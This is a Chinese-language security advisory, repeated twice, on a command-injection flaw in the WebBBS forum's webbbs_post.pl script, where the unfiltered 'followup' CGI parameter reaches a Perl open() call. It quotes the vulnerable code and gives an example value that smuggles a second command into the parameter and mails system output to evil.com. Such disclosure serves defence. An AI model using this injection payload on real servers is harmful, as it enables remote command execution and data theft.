WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序,以简单文本文件存储信息。 WebBBS脚本对用户提交的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。 WebBBS没有正确过滤来自CGI参数上的元字符,攻击者可以提交包含\";\"或者\"|\"等元字符来执行额外命令,问题存在于webbbs_post.pl脚本中: if ($FORM{\'\'followup\'\'}) { $followup = \"$FORM{\'\'followup\'\'}\"; } ... if ($followup) { ... $subdir = \"bbs\".int($followup/1000); open (FOLLOWUP,\"$dir/$subdir/$followup\"); ... 使用如\"followup=10;uname -a|mail zlo@evil.com|\"代替\"followup=10\"变量就可能以WEB权限在系统上执行任意命令。
WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序,以简单文本文件存储信息。 WebBBS脚本对用户提交的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。 WebBBS没有正确过滤来自CGI参数上的元字符,攻击者可以提交包含\";\"或者\"|\"等元字符来执行额外命令,问题存在于webbbs_post.pl脚本中: if ($FORM{\'\'followup\'\'}) { $followup = \"$FORM{\'\'followup\'\'}\"; } ... if ($followup) { ... $subdir = \"bbs\".int($followup/1000); open (FOLLOWUP,\"$dir/$subdir/$followup\"); ... 使用如\"followup=10;uname -a|mail zlo@evil.com|\"代替\"followup=10\"变量就可能以WEB权限在系统上执行任意命令。